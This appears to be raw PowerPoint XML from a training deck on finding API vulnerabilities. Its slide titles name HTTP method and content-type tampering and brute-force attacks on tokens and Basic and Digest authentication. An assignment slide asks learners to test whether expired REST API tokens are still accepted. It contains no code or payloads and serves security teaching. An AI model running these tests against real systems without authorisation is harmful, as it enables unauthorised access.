        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="125488567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xmlns="" id="{FBDCECDC-EEE3-4128-AA5E-82A8C08796E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507"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xmlns="" id="{4260EDE0-989C-4E16-AF94-F652294D828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white">
          <a:xfrm>
            <a:off x="1507" y="495300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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1C092485-3A6D-4168-BB4C-7E38CC53C09E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249680" y="911352"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{2269D7D6-BF3B-4994-92A6-EC10FAE782E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="954405" y="243904"/>
            <a:ext cx="10058400" cy="423544"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Find API vulnerabilities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{74F987EC-2C27-4B1E-8745-FCD1FCA79028}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066783" y="864140"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HTTP Method conversion/tampering</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="235508030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xmlns="" id="{FBDCECDC-EEE3-4128-AA5E-82A8C08796E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507"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xmlns="" id="{4260EDE0-989C-4E16-AF94-F652294D828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white">
          <a:xfrm>
            <a:off x="1507" y="495300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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1C092485-3A6D-4168-BB4C-7E38CC53C09E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249680" y="911352"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{2269D7D6-BF3B-4994-92A6-EC10FAE782E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="954405" y="243904"/>
            <a:ext cx="10058400" cy="423544"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Find API vulnerabilities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{74F987EC-2C27-4B1E-8745-FCD1FCA79028}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066783" y="864140"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Content Type conversion/tampering</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19643394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xmlns="" id="{FBDCECDC-EEE3-4128-AA5E-82A8C08796E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507"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xmlns="" id="{4260EDE0-989C-4E16-AF94-F652294D828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white">
          <a:xfrm>
            <a:off x="1507" y="495300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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1C092485-3A6D-4168-BB4C-7E38CC53C09E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249680" y="911352"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{2269D7D6-BF3B-4994-92A6-EC10FAE782E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="954405" y="243904"/>
            <a:ext cx="10058400" cy="423544"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Find API vulnerabilities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{74F987EC-2C27-4B1E-8745-FCD1FCA79028}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066783" y="864140"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Authorization Token-brute force attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="182151813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xmlns="" id="{FBDCECDC-EEE3-4128-AA5E-82A8C08796E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507"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xmlns="" id="{4260EDE0-989C-4E16-AF94-F652294D828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white">
          <a:xfrm>
            <a:off x="1507" y="495300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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1C092485-3A6D-4168-BB4C-7E38CC53C09E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249680" y="911352"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{2269D7D6-BF3B-4994-92A6-EC10FAE782E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="954405" y="243904"/>
            <a:ext cx="10058400" cy="423544"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Find API vulnerabilities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{74F987EC-2C27-4B1E-8745-FCD1FCA79028}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066783" y="864140"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Authorization-Basic Auth brute force attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="316978740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xmlns="" id="{FBDCECDC-EEE3-4128-AA5E-82A8C08796E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507"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xmlns="" id="{4260EDE0-989C-4E16-AF94-F652294D828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white">
          <a:xfrm>
            <a:off x="1507" y="495300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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1C092485-3A6D-4168-BB4C-7E38CC53C09E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249680" y="911352"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{2269D7D6-BF3B-4994-92A6-EC10FAE782E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="954405" y="243904"/>
            <a:ext cx="10058400" cy="423544"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Find API vulnerabilities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{74F987EC-2C27-4B1E-8745-FCD1FCA79028}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066783" y="864140"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Authorization-Digest Auth brute force attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7416976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xmlns="" id="{FBDCECDC-EEE3-4128-AA5E-82A8C08796E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507"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xmlns="" id="{4260EDE0-989C-4E16-AF94-F652294D828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white">
          <a:xfrm>
            <a:off x="1507" y="495300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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1C092485-3A6D-4168-BB4C-7E38CC53C09E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249680" y="911352"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{E54D64AD-3240-4E20-A815-4A0B70C176E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2033587" y="309562"/>
            <a:ext cx="7553325" cy="5324475"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="180961327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xmlns="" id="{FBDCECDC-EEE3-4128-AA5E-82A8C08796E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507"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xmlns="" id="{4260EDE0-989C-4E16-AF94-F652294D828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white">
          <a:xfrm>
            <a:off x="1507" y="495300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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1C092485-3A6D-4168-BB4C-7E38CC53C09E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249680" y="911352"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{2269D7D6-BF3B-4994-92A6-EC10FAE782E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="954405" y="243904"/>
            <a:ext cx="10058400" cy="423544"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Assignment#0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{74F987EC-2C27-4B1E-8745-FCD1FCA79028}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066783" y="864140"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Use a REST API, check if the token is broken or session mgmt. is not implemented</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hint: Use an expired token after generating a new token for the REST APIs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20834341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xmlns="" id="{FBDCECDC-EEE3-4128-AA5E-82A8C08796E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507"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xmlns="" id="{4260EDE0-989C-4E16-AF94-F652294D828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white">
          <a:xfrm>
            <a:off x="1507" y="495300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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1C092485-3A6D-4168-BB4C-7E38CC53C09E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249680" y="911352"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title 1">
            <a:extLst>
